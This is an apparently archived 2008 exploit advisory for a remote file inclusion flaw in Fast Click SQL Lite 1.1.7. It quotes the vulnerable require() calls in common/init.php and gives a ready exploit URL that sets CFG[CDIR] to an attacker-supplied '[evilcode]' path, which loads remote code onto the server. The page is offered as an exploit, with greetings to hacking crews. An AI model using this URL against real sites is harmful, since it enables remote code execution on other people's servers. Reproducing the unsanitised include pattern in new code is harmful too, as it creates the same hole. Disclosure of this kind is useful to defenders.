[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability
# Published : 2008-10-19
# Author : NoGe
# Previous Title : XOOPS Module makale Remote SQL Injection Vulnerability
# Next Title : yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion Vulnerability
===========================================================================================
[o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability
Software : Fast CLick SQL Lite version 1.1.7
Vendor : http://www.ftrsoft.com/
Download : http://www.ftrsoft.com/downloads.html
Author : NoGe
Contact : noge[at]mainhack[dot]com
===========================================================================================
[o] Vulnerable file
common/init.php
require($CFG['CDIR'].'/global.php');
require($CFG['CDIR'].'/sql.php');
[o] Exploit
http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]
===========================================================================================
[o] Greetz
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
===========================================================================================
# www.Syue.com [2008-10-19]